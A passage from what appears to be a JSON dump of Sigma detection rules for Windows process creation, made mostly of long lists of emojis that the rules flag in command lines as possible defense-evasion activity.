'🧛🏽'\n            - '🧛🏽‍♂️'\n            - '🧜🏽‍♀️'\n            - '🧜🏽'\n            - '🧜🏽‍♂️'\n            - '🧚🏽‍♀️'\n            - '🧚🏽'\n            - '🧚🏽‍♂️'\n            - '👼🏽'\n            - '🤰🏽'\n            - '🫄🏽'\n            - '🫃🏽'\n            - '🤱🏽'\n            - '👩🏽‍🍼'\n            - '🧑🏽‍🍼'\n            - '👨🏽‍🍼'\n            - '🙇🏽‍♀️'\n            - '🙇🏽'\n            - '🙇🏽‍♂️'\n            - '💁🏽‍♀️'\n            - '💁🏽'\n            - '💁🏽‍♂️'\n            - '🙅🏽‍♀️'\n            - '🙅🏽'\n            - '🙅🏽‍♂️'\n            - '🙆🏽‍♀️'\n            - '🙆🏽'\n            - '🙆🏽‍♂️'\n            - '🙋🏽‍♀️'\n            - '🙋🏽'\n            - '🙋🏽‍♂️'\n            - '🧏🏽‍♀️'\n            - '🧏🏽'\n            - '🧏🏽‍♂️'\n            - '🤦🏽‍♀️'\n            - '🤦🏽'\n            - '🤦🏽‍♂️'\n            - '🤷🏽‍♀️'\n            - '🤷🏽'\n            - '🤷🏽‍♂️'\n            - '🙎🏽‍♀️'\n            - '🙎🏽'\n            - '🙎🏽‍♂️'\n            - '🙍🏽‍♀️'\n            - '🙍🏽'\n            - '🙍🏽‍♂️'\n            - '💇🏽‍♀️'\n            - '💇🏽'\n            - '💇🏽‍♂️'\n            - '💆🏽‍♀️'\n            - '💆🏽'\n            - '💆🏽‍♂️'\n            - '🧖🏽‍♀️'\n            - '🧖🏽'\n            - '🧖🏽‍♂️'\n            - '💃🏽'\n            - '🕺🏽'\n            - '🕴🏽'\n            - '👩🏽‍🦽'\n            - '🧑🏽‍🦽'\n            - '👨🏽‍🦽'\n            - '👩🏽‍🦼'\n            - '🧑🏽‍🦼'\n            - '👨🏽‍🦼'\n            - '🚶🏽‍♀️'\n            - '🚶🏽'\n            - '🚶🏽‍♂️'\n            - '👩🏽‍🦯'\n            - '🧑🏽‍🦯'\n            - '👨🏽‍🦯'\n            - '🧎🏽‍♀️'\n            - '🧎🏽'\n            - '🧎🏽‍♂️'\n            - '🏃🏽‍♀️'\n            - '🏃🏽'\n            - '🏃🏽‍♂️'\n            - '🧍🏽‍♀️'\n            - '🧍🏽'\n            - '🧍🏽‍♂️'\n            - '👭🏽'\n            - '🧑🏽‍🤝‍🧑🏽'\n            - '👬🏽'\n            - '👫🏽'\n            - '🧗🏽‍♀️'\n            - '🧗🏽'\n            - '🧗🏽‍♂️'\n            - '🏇🏽'\n            - '🏂🏽'\n            - '🏌🏽‍♀️'\n            - '🏌🏽'\n            - '🏌🏽‍♂️'\n            - '🏄🏽‍♀️'\n            
- '🏄🏽'\n            - '🏄🏽‍♂️'\n            - '🚣🏽‍♀️'\n            - '🚣🏽'\n            - '🚣🏽‍♂️'\n            - '🏊🏽‍♀️'\n            - '🏊🏽'\n            - '🏊🏽‍♂️'\n            - '⛹🏽‍♀️'\n            - '⛹🏽'\n            - '⛹🏽‍♂️'\n            - '🏋🏽‍♀️'\n            - '🏋🏽'\n            - '🏋🏽‍♂️'\n            - '🚴🏽‍♀️'\n            - '🚴🏽'\n            - '🚴🏽‍♂️'\n            - '🚵🏽‍♀️'\n            - '🚵🏽'\n            - '🚵🏽‍♂️'\n            - '🤸🏽‍♀️'\n            - '🤸🏽'\n            - '🤸🏽‍♂️'\n            - '🤽🏽‍♀️'\n            - '🤽🏽'\n            - '🤽🏽‍♂️'\n            - '🤾🏽‍♀️'\n            - '🤾🏽'\n            - '🤾🏽‍♂️'\n            - '🤹🏽‍♀️'\n            - '🤹🏽'\n            - '🤹🏽‍♂️'\n            - '🧘🏽‍♀️'\n            - '🧘🏽'\n            - '🧘🏽‍♂️'\n            - '🛀🏽'\n            - '🛌🏽'\n            - '👋🏾'\n            - '🤚🏾'\n            - '🖐🏾'\n            - '✋🏾'\n            - '🖖🏾'\n            - '👌🏾'\n            - '🤌🏾'\n            - '🤏🏾'\n            - '✌🏾'\n            - '🤞🏾'\n            - '🫰🏾'\n            - '🤟🏾'\n            - '🤘🏾'\n            - '🤙🏾'\n            - '🫵🏾'\n            - '🫱🏾'\n            - '🫲🏾'\n            - '🫳🏾'\n            - '🫴🏾'\n            - '👈🏾'\n            - '👉🏾'\n            - '👆🏾'\n            - '🖕🏾'\n            - '👇🏾'\n            - '☝🏾'\n            - '👍🏾'\n            - '👎🏾'\n            - '✊🏾'\n            - '👊🏾'\n            - '🤛🏾'\n            - '🤜🏾'\n            - '👏🏾'\n            - '🫶🏾'\n            - '🙌🏾'\n            - '👐🏾'\n            - '🤲🏾'\n            - '🙏🏾'\n            - '✍🏾'\n            - '💪🏾'\n            - '🦵🏾'\n            - '🦶🏾'\n            - '👂🏾'\n            - '🦻🏾'\n            - '👃🏾'\n            - '👶🏾'\n            - '👧🏾'\n            - '🧒🏾'\n            - '👦🏾'\n            - '👩🏾'\n            - '🧑🏾'\n            - '👨🏾'\n            - '👩🏾‍🦱'\n            - '🧑🏾‍🦱'\n            - '👨🏾‍🦱'\n            - '👩🏾‍🦰'\n            - '🧑🏾‍🦰'\n            - '👨🏾‍🦰'\n            - '👱🏾‍♀️'\n            - '👱🏾'\n        
    - '👱🏾‍♂️'\n            - '👩🏾‍🦳'\n            - '🧑🏾‍🦳'\n            - '👨🏾‍🦳'\n            - '👩🏾‍🦲'\n            - '🧑🏾‍🦲'\n            - '👨🏾‍🦲'\n            - '🧔🏾‍♀️'\n            - '🧔🏾'\n            - '🧔🏾‍♂️'\n            - '👵🏾'\n            - '🧓🏾'\n            - '👴🏾'\n            - '👲🏾'\n            - '👳🏾‍♀️'\n            - '👳🏾'\n            - '👳🏾‍♂️'\n            - '🧕🏾'\n            - '👮🏾‍♀️'\n            - '👮🏾'\n            - '👮🏾‍♂️'\n            - '👷🏾‍♀️'\n            - '👷🏾'\n            - '👷🏾‍♂️'\n            - '💂🏾‍♀️'\n            - '💂🏾'\n            - '💂🏾‍♂️'\n            - '🕵🏾‍♀️'\n            - '🕵🏾'\n            - '🕵🏾‍♂️'\n            - '👩🏾‍⚕️'\n            - '🧑🏾‍⚕️'\n            - '👨🏾‍⚕️'\n            - '👩🏾‍🌾'\n            - '🧑🏾‍🌾'\n            - '👨🏾‍🌾'\n            - '👩🏾‍🍳'\n            - '🧑🏾‍🍳'\n            - '👨🏾‍🍳'\n            - '👩🏾‍🎓'\n            - '🧑🏾‍🎓'\n            - '👨🏾‍🎓'\n            - '👩🏾‍🎤'\n            - '🧑🏾‍🎤'\n            - '👨🏾‍🎤'\n            - '👩🏾‍🏫'\n            - '🧑🏾‍🏫'\n            - '👨🏾‍🏫'\n            - '👩🏾‍🏭'\n            - '🧑🏾‍🏭'\n            - '👨🏾‍🏭'\n            - '👩🏾‍💻'\n            - '🧑🏾‍💻'\n            - '👨🏾‍💻'\n            - '👩🏾‍💼'\n            - '🧑🏾‍💼'\n            - '👨🏾‍💼'\n            - '👩🏾‍🔧'\n            - '🧑🏾‍🔧'\n            - '👨🏾‍🔧'\n            - '👩🏾‍🔬'\n            - '🧑🏾‍🔬'\n            - '👨🏾‍🔬'\n            - '👩🏾‍🎨'\n            - '🧑🏾‍🎨'\n            - '👨🏾‍🎨'\n            - '👩🏾‍🚒'\n            - '🧑🏾‍🚒'\n            - '👨🏾‍🚒'\n            - '👩🏾‍✈️'\n            - '🧑🏾‍✈️'\n            - '👨🏾‍✈️'\n            - '👩🏾‍🚀'\n            - '🧑🏾‍🚀'\n            - '👨🏾‍🚀'\n            - '👩🏾‍⚖️'\n            - '🧑🏾‍⚖️'\n            - '👨🏾‍⚖️'\n            - '👰🏾‍♀️'\n            - '👰🏾'\n            - '👰🏾‍♂️'\n            - '🤵🏾‍♀️'\n            - '🤵🏾'\n            - '🤵🏾‍♂️'\n            - '👸🏾'\n            - '🫅🏾'\n            - '🤴🏾'\n            - '🥷🏾'\n            - '🦸🏾‍♀️'\n            - '🦸🏾'\n            - '🦸🏾‍♂️'\n            - 
'🦹🏾‍♀️'\n            - '🦹🏾'\n            - '🦹🏾‍♂️'\n            - '🤶🏾'\n            - '🧑🏾‍🎄'\n            - '🎅🏾'\n            - '🧙🏾‍♀️'\n            - '🧙🏾'\n            - '🧙🏾‍♂️'\n            - '🧝🏾‍♀️'\n            - '🧝🏾'\n            - '🧝🏾‍♂️'\n            - '🧛🏾‍♀️'\n            - '🧛🏾'\n            - '🧛🏾‍♂️'\n            - '🧜🏾‍♀️'\n            - '🧜🏾'\n            - '🧜🏾‍♂️'\n            - '🧚🏾‍♀️'\n            - '🧚🏾'\n            - '🧚🏾‍♂️'\n            - '👼🏾'\n            - '🤰🏾'\n            - '🫄🏾'\n            - '🫃🏾'\n            - '🤱🏾'\n            - '👩🏾‍🍼'\n            - '🧑🏾‍🍼'\n            - '👨🏾‍🍼'\n            - '🙇🏾‍♀️'\n            - '🙇🏾'\n            - '🙇🏾‍♂️'\n            - '💁🏾‍♀️'\n            - '💁🏾'\n            - '💁🏾‍♂️'\n            - '🙅🏾‍♀️'\n            - '🙅🏾'\n            - '🙅🏾‍♂️'\n            - '🙆🏾‍♀️'\n            - '🙆🏾'\n            - '🙆🏾‍♂️'\n            - '🙋🏾‍♀️'\n            - '🙋🏾'\n            - '🙋🏾‍♂️'\n            - '🧏🏾‍♀️'\n            - '🧏🏾'\n            - '🧏🏾‍♂️'\n            - '🤦🏾‍♀️'\n            - '🤦🏾'\n            - '🤦🏾‍♂️'\n            - '🤷🏾‍♀️'\n            - '🤷🏾'\n            - '🤷🏾‍♂️'\n            - '🙎🏾‍♀️'\n            - '🙎🏾'\n            - '🙎🏾‍♂️'\n            - '🙍🏾‍♀️'\n            - '🙍🏾'\n            - '🙍🏾‍♂️'\n            - '💇🏾‍♀️'\n            - '💇🏾'\n            - '💇🏾‍♂️'\n            - '💆🏾‍♀️'\n            - '💆🏾'\n            - '💆🏾‍♂️'\n            - '🧖🏾‍♀️'\n            - '🧖🏾'\n            - '🧖🏾‍♂️'\n            - '💃🏾'\n            - '🕺🏾'\n            - '👩🏾‍🦽'\n            - '🧑🏾‍🦽'\n            - '👨🏾‍🦽'\n            - '👩🏾‍🦼'\n            - '🧑🏾‍🦼'\n            - '👨🏾‍🦼'\n            - '🚶🏾‍♀️'\n            - '🚶🏾'\n            - '🚶🏾‍♂️'\n            - '👩🏾‍🦯'\n            - '🧑🏾‍🦯'\n            - '👨🏾‍🦯'\n            - '🧎🏾‍♀️'\n            - '🧎🏾'\n            - '🧎🏾‍♂️'\n            - '🏃🏾‍♀️'\n            - '🏃🏾'\n            - '🏃🏾‍♂️'\n            - '🧍🏾‍♀️'\n            - '🧍🏾'\n            - '🧍🏾‍♂️'\n            - '👭🏾'\n          
  - '🧑🏾‍🤝‍🧑🏾'\n            - '👬🏾'\n            - '👫🏾'\n            - '🧗🏾‍♀️'\n            - '🧗🏾'\n            - '🧗🏾‍♂️'\n            - '🏇🏾'\n            - '🏂🏾'\n            - '🏌🏾‍♀️'\n            - '🏌🏾'\n            - '🏌🏾‍♂️'\n            - '🏄🏾‍♀️'\n            - '🏄🏾'\n            - '🏄🏾‍♂️'\n            - '🚣🏾‍♀️'\n            - '🚣🏾'\n            - '🚣🏾‍♂️'\n            - '🏊🏾‍♀️'\n            - '🏊🏾'\n            - '🏊🏾‍♂️'\n            - '⛹🏾‍♀️'\n            - '⛹🏾'\n            - '⛹🏾‍♂️'\n            - '🏋🏾‍♀️'\n            - '🏋🏾'\n            - '🏋🏾‍♂️'\n            - '🚴🏾‍♀️'\n            - '🚴🏾'\n            - '🚴🏾‍♂️'\n            - '🚵🏾‍♀️'\n            - '🚵🏾'\n            - '🚵🏾‍♂️'\n            - '🤸🏾‍♀️'\n            - '🤸🏾'\n            - '🤸🏾‍♂️'\n            - '🤽🏾‍♀️'\n            - '🤽🏾'\n            - '🤽🏾‍♂️'\n            - '🤾🏾‍♀️'\n            - '🤾🏾'\n            - '🤾🏾‍♂️'\n            - '🤹🏾‍♀️'\n            - '🤹🏾'\n            - '🤹🏾‍♂️'\n            - '🧘🏾‍♀️'\n            - '🧘🏾'\n            - '🧘🏾‍♂️'\n            - '🛀🏾'\n            - '🛌🏾'\n            - '👋🏿'\n            - '🤚🏿'\n            - '🖐🏿'\n            - '✋🏿'\n            - '🖖🏿'\n            - '👌🏿'\n            - '🤌🏿'\n            - '🤏🏿'\n            - '✌🏿'\n            - '🤞🏿'\n            - '🫰🏿'\n            - '🤟🏿'\n            - '🤘🏿'\n            - '🤙🏿'\n            - '🫵🏿'\n            - '🫱🏿'\n            - '🫲🏿'\n            - '🫳🏿'\n            - '🫴🏿'\n            - '👈🏿'\n            - '👉🏿'\n            - '👆🏿'\n            - '🖕🏿'\n            - '👇🏿'\n            - '☝🏿'\n            - '👍🏿'\n            - '👎🏿'\n            - '✊🏿'\n            - '👊🏿'\n            - '🤛🏿'\n            - '🤜🏿'\n            - '👏🏿'\n            - '🫶🏿'\n            - '🙌🏿'\n            - '👐🏿'\n            - '🤲🏿'\n            - '🙏🏿'\n            - '✍🏿'\n            - '🤳🏿'\n            - '💪🏿'\n            - '🦵🏿'\n            - '🦶🏿'\n            - '👂🏿'\n            - '🦻🏿'\n            - '👃🏿'\n            - '👶🏿'\n            - '👧🏿'\n 
           - '🧒🏿'\n            - '👦🏿'\n            - '👩🏿'\n            - '🧑🏿'\n            - '👨🏿'\n            - '👩🏿‍🦱'\n            - '🧑🏿‍🦱'\n            - '👨🏿‍🦱'\n            - '👩🏿‍🦰'\n            - '🧑🏿‍🦰'\n            - '👨🏿‍🦰'\n            - '👱🏿‍♀️'\n            - '👱🏿'\n            - '👱🏿‍♂️'\n            - '👩🏿‍🦳'\n            - '🧑🏿‍🦳'\n            - '👨🏿‍🦳'\n            - '👩🏿‍🦲'\n            - '🧑🏿‍🦲'\n            - '👨🏿‍🦲'\n            - '🧔🏿‍♀️'\n            - '🧔🏿'\n            - '🧔🏿‍♂️'\n            - '👵🏿'\n            - '🧓🏿'\n            - '👴🏿'\n            - '👲🏿'\n            - '👳🏿‍♀️'\n            - '👳🏿'\n            - '👳🏿‍♂️'\n            - '🧕🏿'\n            - '👮🏿‍♀️'\n            - '👮🏿'\n            - '👮🏿‍♂️'\n            - '👷🏿‍♀️'\n            - '👷🏿'\n            - '👷🏿‍♂️'\n            - '💂🏿‍♀️'\n            - '💂🏿'\n            - '💂🏿‍♂️'\n            - '🕵🏿‍♀️'\n            - '🕵🏿'\n            - '🕵🏿‍♂️'\n            - '👩🏿‍⚕️'\n            - '🧑🏿‍⚕️'\n            - '👨🏿‍⚕️'\n            - '👩🏿‍🌾'\n            - '🧑🏿‍🌾'\n            - '👨🏿‍🌾'\n            - '👩🏿‍🍳'\n            - '🧑🏿‍🍳'\n            - '👨🏿‍🍳'\n            - '👩🏿‍🎓'\n            - '🧑🏿‍🎓'\n            - '👨🏿‍🎓'\n            - '👩🏿‍🎤'\n            - '🧑🏿‍🎤'\n            - '👨🏿‍🎤'\n            - '👩🏿‍🏫'\n            - '🧑🏿‍🏫'\n            - '👨🏿‍🏫'\n            - '👩🏿‍🏭'\n            - '🧑🏿‍🏭'\n            - '👨🏿‍🏭'\n            - '👩🏿‍💻'\n            - '🧑🏿‍💻'\n            - '👨🏿‍💻'\n            - '👩🏿‍💼'\n            - '🧑🏿‍💼'\n            - '👨🏿‍💼'\n            - '👩🏿‍🔧'\n            - '🧑🏿‍🔧'\n            - '👨🏿‍🔧'\n            - '👩🏿‍🔬'\n            - '🧑🏿‍🔬'\n            - '👨🏿‍🔬'\n            - '👩🏿‍🎨'\n            - '🧑🏿‍🎨'\n            - '👨🏿‍🎨'\n            - '👩🏿‍🚒'\n            - '🧑🏿‍🚒'\n            - '👨🏿‍🚒'\n            - '👩🏿‍✈️'\n            - '🧑🏿‍✈️'\n            - '👨🏿‍✈️'\n            - '👩🏿‍🚀'\n            - '🧑🏿‍🚀'\n            - '👨🏿‍🚀'\n            - '👩🏿‍⚖️'\n            - '🧑🏿‍⚖️'\n            - '👨🏿‍⚖️'\n          
  - '👰🏿‍♀️'\n            - '👰🏿'\n            - '👰🏿‍♂️'\n            - '🤵🏿‍♀️'\n            - '🤵🏿'\n            - '🤵🏿‍♂️'\n            - '👸🏿'\n            - '🫅🏿'\n            - '🤴🏿'\n            - '🥷🏿'\n            - '🦸🏿‍♀️'\n            - '🦸🏿'\n            - '🦸🏿‍♂️'\n            - '🦹🏿‍♀️'\n            - '🦹🏿'\n            - '🦹🏿‍♂️'\n            - '🤶🏿'\n            - '🧑🏿‍🎄'\n            - '🎅🏿'\n            - '🧙🏿‍♀️'\n            - '🧙🏿'\n            - '🧙🏿‍♂️'\n            - '🧝🏿‍♀️'\n            - '🧝🏿'\n            - '🧝🏿‍♂️'\n            - '🧛🏿‍♀️'\n            - '🧛🏿'\n            - '🧛🏿‍♂️'\n            - '🧜🏿‍♀️'\n            - '🧜🏿'\n            - '🧜🏿‍♂️'\n            - '🧚🏿‍♀️'\n            - '🧚🏿'\n            - '🧚🏿‍♂️'\n            - '👼🏿'\n            - '🤰🏿'\n            - '🫄🏿'\n            - '🫃🏿'\n            - '🤱🏿'\n            - '👩🏿‍🍼'\n            - '🧑🏿‍🍼'\n            - '👨🏿‍🍼'\n            - '🙇🏿‍♀️'\n            - '🙇🏿'\n            - '🙇🏿‍♂️'\n            - '💁🏿‍♀️'\n            - '💁🏿'\n            - '💁🏿‍♂️'\n            - '🙅🏿‍♀️'\n            - '🙅🏿'\n            - '🙅🏿‍♂️'\n            - '🙆🏿‍♀️'\n            - '🙆🏿'\n            - '🙆🏿‍♂️'\n            - '🙋🏿‍♀️'\n            - '🙋🏿'\n            - '🙋🏿‍♂️'\n            - '🧏🏿‍♀️'\n            - '🧏🏿'\n            - '🧏🏿‍♂️'\n            - '🤦🏿‍♀️'\n            - '🤦🏿'\n            - '🤦🏿‍♂️'\n            - '🤷🏿‍♀️'\n            - '🤷🏿'\n            - '🤷🏿‍♂️'\n            - '🙎🏿‍♀️'\n            - '🙎🏿'\n            - '🙎🏿‍♂️'\n            - '🙍🏿‍♀️'\n            - '🙍🏿'\n            - '🙍🏿‍♂️'\n            - '💇🏿‍♀️'\n            - '💇🏿'\n            - '💇🏿‍♂️'\n            - '💆🏿‍♀️'\n            - '💆🏿'\n            - '💆🏿‍♂️'\n            - '🧖🏿‍♀️'\n            - '🧖🏿'\n            - '🧖🏿‍♂️'\n            - '💃🏿'\n            - '🕺🏿'\n            - '🕴🏿'\n            - '👩🏿‍🦽'\n            - '🧑🏿‍🦽'\n            - '👨🏿‍🦽'\n            - '👩🏿‍🦼'\n            - '🧑🏿‍🦼'\n            - '👨🏿‍🦼'\n            - '🚶🏿‍♀️'\n            - '🚶🏿'\n            - 
'🚶🏿‍♂️'\n            - '👩🏿‍🦯'\n            - '🧑🏿‍🦯'\n            - '👨🏿‍🦯'\n            - '🧎🏿‍♀️'\n            - '🧎🏿'\n            - '🧎🏿‍♂️'\n            - '🏃🏿‍♀️'\n            - '🏃🏿'\n            - '🏃🏿‍♂️'\n            - '🧍🏿‍♀️'\n            - '🧍🏿'\n            - '🧍🏿‍♂️'\n            - '👭🏿'\n            - '🧑🏿‍🤝‍🧑🏿'\n            - '👬🏿'\n            - '👫🏿'\n            - '🧗🏿‍♀️'\n            - '🧗🏿'\n            - '🧗🏿‍♂️'\n            - '🏇🏿'\n            - '🏂🏿'\n            - '🏌🏿‍♀️'\n            - '🏌🏿'\n            - '🏌🏿‍♂️'\n            - '🏄🏿‍♀️'\n            - '🏄🏿'\n            - '🏄🏿‍♂️'\n            - '🚣🏿‍♀️'\n            - '🚣🏿'\n            - '🚣🏿‍♂️'\n            - '🏊🏿‍♀️'\n            - '🏊🏿'\n            - '🏊🏿‍♂️'\n            - '⛹🏿‍♀️'\n            - '⛹🏿'\n            - '⛹🏿‍♂️'\n            - '🏋🏿‍♀️'\n            - '🏋🏿'\n            - '🏋🏿‍♂️'\n            - '🚴🏿‍♀️'\n            - '🚴🏿'\n            - '🚴🏿‍♂️'\n            - '🚵🏿‍♀️'\n            - '🚵🏿'\n            - '🚵🏿‍♂️'\n            - '🤸🏿‍♀️'\n            - '🤸🏿'\n            - '🤸🏿‍♂️'\n            - '🤽🏿‍♀️'\n            - '🤽🏿'\n            - '🤽🏿‍♂️'\n            - '🤾🏿‍♀️'\n            - '🤾🏿'\n            - '🤾🏿‍♂️'\n            - '🤹🏿‍♀️'\n            - '🤹🏿'\n            - '🤹🏿‍♂️'\n            - '🧘🏿‍♀️'\n            - '🧘🏿'\n            - '🧘🏿‍♂️'\n            - '🛀🏿'\n            - '🛌🏿'\n            - '🐶'\n            - '🐱'\n            - '🐭'\n            - '🐹'\n            - '🐰'\n            - '🦊'\n            - '🐻'\n            - '🐼'\n            - '🐻‍❄️'\n            - '🐨'\n            - '🐯'\n            - '🦁'\n            - '🐮'\n            - '🐷'\n            - '🐽'\n            - '🐸'\n            - '🐵'\n            - '🙈'\n            - '🙉'\n            - '🙊'\n            - '🐒'\n            - '🐔'\n            - '🐧'\n            - '🐦'\n            - '🐤'\n            - '🐣'\n            - '🐥'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_3.yml",
    "content": "title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3\nid: f9578658-9e71-4711-b634-3f9b50cd3c06\nstatus: test\ndescription: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.\nauthor: '@Kostastsale, TheDFIRReport'\nreferences:\n    - Internal Research\ntags:\n    - attack.defense-evasion\ndate: 2022-12-05\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - '🦆'\n            - '🦅'\n            - '🦉'\n            - '🦇'\n            - '🐺'\n            - '🐗'\n            - '🐴'\n            - '🦄'\n            - '🐝'\n            - '🪱'\n            - '🐛'\n            - '🦋'\n            - '🐌'\n            - '🐞'\n            - '🐜'\n            - '🪰'\n            - '🪲'\n            - '🪳'\n            - '🦟'\n            - '🦗'\n            - '🕷'\n            - '🕸'\n            - '🦂'\n            - '🐢'\n            - '🐍'\n            - '🦎'\n            - '🦖'\n            - '🦕'\n            - '🐙'\n            - '🦑'\n            - '🦐'\n            - '🦞'\n            - '🦀'\n            - '🪸'\n            - '🐡'\n            - '🐠'\n            - '🐟'\n            - '🐬'\n            - '🐳'\n            - '🐋'\n            - '🦈'\n            - '🐊'\n            - '🐅'\n            - '🐆'\n            - '🦓'\n            - '🦍'\n            - '🦧'\n            - '🦣'\n            - '🐘'\n            - '🦛'\n            - '🦏'\n            - '🐪'\n            - '🐫'\n            - '🦒'\n            - '🦘'\n            - '🦬'\n            - '🐃'\n            - '🐂'\n            - '🐄'\n            - '🐎'\n            - '🐖'\n            - '🐏'\n            - '🐑'\n            - '🦙'\n            - '🐐'\n            - '🦌'\n            - '🐕'\n            - '🐩'\n            - '🦮'\n            - '🐕‍🦺'\n            - '🐈'\n            - '🐈‍⬛'\n            - '🪶'\n            - '🐓'\n            - '🦃'\n            - '🦤'\n            - '🦚'\n   
         - '🦜'\n            - '🦢'\n            - '🦩'\n            - '🕊'\n            - '🐇'\n            - '🦝'\n            - '🦨'\n            - '🦡'\n            - '🦫'\n            - '🦦'\n            - '🦥'\n            - '🐁'\n            - '🐀'\n            - '🐿'\n            - '🦔'\n            - '🐾'\n            - '🐉'\n            - '🐲'\n            - '🌵'\n            - '🎄'\n            - '🌲'\n            - '🌳'\n            - '🌴'\n            - '🪹'\n            - '🪺'\n            - '🪵'\n            - '🌱'\n            - '🌿'\n            - '☘️'\n            - '🍀'\n            - '🎍'\n            - '🪴'\n            - '🎋'\n            - '🍃'\n            - '🍂'\n            - '🍁'\n            - '🍄'\n            - '🐚'\n            - '🪨'\n            - '🌾'\n            - '💐'\n            - '🌷'\n            - '🪷'\n            - '🌹'\n            - '🥀'\n            - '🌺'\n            - '🌸'\n            - '🌼'\n            - '🌻'\n            - '🌞'\n            - '🌝'\n            - '🌛'\n            - '🌜'\n            - '🌚'\n            - '🌕'\n            - '🌖'\n            - '🌗'\n            - '🌘'\n            - '🌑'\n            - '🌒'\n            - '🌓'\n            - '🌔'\n            - '🌙'\n            - '🌎'\n            - '🌍'\n            - '🌏'\n            - '🪐'\n            - '💫'\n            - '⭐️'\n            - '🌟'\n            - '✨'\n            - '⚡️'\n            - '☄️'\n            - '💥'\n            - '🔥'\n            - '🌪'\n            - '🌈'\n            - '☀️'\n            - '🌤'\n            - '⛅️'\n            - '🌥'\n            - '☁️'\n            - '🌦'\n            - '🌧'\n            - '⛈'\n            - '🌩'\n            - '🌨'\n            - '❄️'\n            - '☃️'\n            - '⛄️'\n            - '🌬'\n            - '💨'\n            - '💧'\n            - '💦'\n            - '🫧'\n            - '☔️'\n            - '☂️'\n            - '🌊'\n            - '🌫🍏'\n            - '🍎'\n            - '🍐'\n            - '🍊'\n            - '🍋'\n            - '🍌'\n            - 
'🍉'\n            - '🍇'\n            - '🍓'\n            - '🫐'\n            - '🍈'\n            - '🍒'\n            - '🍑'\n            - '🥭'\n            - '🍍'\n            - '🥥'\n            - '🥝'\n            - '🍅'\n            - '🍆'\n            - '🥑'\n            - '🥦'\n            - '🥬'\n            - '🥒'\n            - '🌶'\n            - '🫑'\n            - '🌽'\n            - '🥕'\n            - '🫒'\n            - '🧄'\n            - '🧅'\n            - '🥔'\n            - '🍠'\n            - '🫘'\n            - '🥐'\n            - '🥯'\n            - '🍞'\n            - '🥖'\n            - '🥨'\n            - '🧀'\n            - '🥚'\n            - '🍳'\n            - '🧈'\n            - '🥞'\n            - '🧇'\n            - '🥓'\n            - '🥩'\n            - '🍗'\n            - '🍖'\n            - '🦴'\n            - '🌭'\n            - '🍔'\n            - '🍟'\n            - '🍕'\n            - '🫓'\n            - '🥪'\n            - '🥙'\n            - '🧆'\n            - '🌮'\n            - '🌯'\n            - '🫔'\n            - '🥗'\n            - '🥘'\n            - '🫕'\n            - '🥫'\n            - '🍝'\n            - '🍜'\n            - '🍲'\n            - '🍛'\n            - '🍣'\n            - '🍱'\n            - '🥟'\n            - '🦪'\n            - '🍤'\n            - '🍙'\n            - '🍚'\n            - '🍘'\n            - '🍥'\n            - '🥠'\n            - '🥮'\n            - '🍢'\n            - '🍡'\n            - '🍧'\n            - '🍨'\n            - '🍦'\n            - '🥧'\n            - '🧁'\n            - '🍰'\n            - '🎂'\n            - '🍮'\n            - '🍭'\n            - '🍬'\n            - '🍫'\n            - '🍿'\n            - '🍩'\n            - '🍪'\n            - '🌰'\n            - '🥜'\n            - '🍯'\n            - '🥛'\n            - '🍼'\n            - '🫖'\n            - '☕️'\n            - '🍵'\n            - '🧃'\n            - '🥤'\n            - '🧋'\n            - '🫙'\n            - '🍶'\n            - '🍺'\n            - '🍻'\n            - '🥂'\n            - 
'🍷'\n            - '🫗'\n            - '🥃'\n            - '🍸'\n            - '🍹'\n            - '🧉'\n            - '🍾'\n            - '🧊'\n            - '🥄'\n            - '🍴'\n            - '🍽'\n            - '🥣'\n            - '🥡'\n            - '🥢'\n            - '🧂'\n            - '⚽️'\n            - '🏀'\n            - '🏈'\n            - '⚾️'\n            - '🥎'\n            - '🎾'\n            - '🏐'\n            - '🏉'\n            - '🥏'\n            - '🎱'\n            - '🪀'\n            - '🏓'\n            - '🏸'\n            - '🏒'\n            - '🏑'\n            - '🥍'\n            - '🏏'\n            - '🪃'\n            - '🥅'\n            - '⛳️'\n            - '🪁'\n            - '🏹'\n            - '🎣'\n            - '🤿'\n            - '🥊'\n            - '🥋'\n            - '🎽'\n            - '🛹'\n            - '🛼'\n            - '🛷'\n            - '⛸'\n            - '🥌'\n            - '🎿'\n            - '⛷'\n            - '🏂'\n            - '🪂'\n            - '🏋️‍♀️'\n            - '🏋️'\n            - '🏋️‍♂️'\n            - '🤼‍♀️'\n            - '🤼'\n            - '🤼‍♂️'\n            - '🤸‍♀️'\n            - '🤸'\n            - '🤸‍♂️'\n            - '⛹️‍♀️'\n            - '⛹️'\n            - '⛹️‍♂️'\n            - '🤺'\n            - '🤾‍♀️'\n            - '🤾'\n            - '🤾‍♂️'\n            - '🏌️‍♀️'\n            - '🏌️'\n            - '🏌️‍♂️'\n            - '🏇'\n            - '🧘‍♀️'\n            - '🧘'\n            - '🧘‍♂️'\n            - '🏄‍♀️'\n            - '🏄'\n            - '🏄‍♂️'\n            - '🏊‍♀️'\n            - '🏊'\n            - '🏊‍♂️'\n            - '🤽‍♀️'\n            - '🤽'\n            - '🤽‍♂️'\n            - '🚣‍♀️'\n            - '🚣'\n            - '🚣‍♂️'\n            - '🧗‍♀️'\n            - '🧗'\n            - '🧗‍♂️'\n            - '🚵‍♀️'\n            - '🚵'\n            - '🚵‍♂️'\n            - '🚴‍♀️'\n            - '🚴'\n            - '🚴‍♂️'\n            - '🏆'\n            - '🥇'\n            - '🥈'\n            - '🥉'\n            - '🏅'\n            - 
